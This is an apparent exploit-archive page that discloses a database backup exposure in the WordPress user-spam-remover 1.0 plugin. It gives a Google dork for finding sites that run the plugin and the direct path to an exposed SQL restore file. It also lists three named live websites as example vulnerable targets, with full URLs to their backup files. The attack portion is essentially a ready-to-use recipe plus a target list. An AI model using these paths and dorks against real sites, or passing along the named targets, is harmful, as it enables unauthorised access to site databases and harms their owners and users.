exploit the possibilities

WordPress user-spam-remover 1.0 Database Disclosure

WordPress user-spam-remover 1.0 Database Disclosure
Posted Nov 29, 2018
Authored by KingSkrupellos

WordPress user-spam-remover plugin version 1.0 suffers from a database backup disclosure vulnerability.

tags | exploit, info disclosure
MD5 | 7bbdba454a9350ef45498ab34b6aeb06

WordPress user-spam-remover 1.0 Database Disclosure

Change Mirror Download
#################################################################################################

# Exploit Title : WordPress user-spam-remover 1.0 Plugins Database Backup
Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 28/11/2018
# Vendor Homepage : wordpress.org/plugins/user-spam-remover/
+ lyncd.com/user-spam-remover/
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : All Current Versions and 1.0
# Google Dorks : inurl:''/wp-content/plugins/user-spam-remover/''
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110233

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql

#################################################################################################

# Example Vulnerable Sites =>

[+]
howafrica.com/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql

[+]
sarawakvoice.com/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql

[+]
americasbestmyspace.com/myspace-comments-blog/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    7 Files
  • 11
    Jul 11th
    4 Files
  • 12
    Jul 12th
    4 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close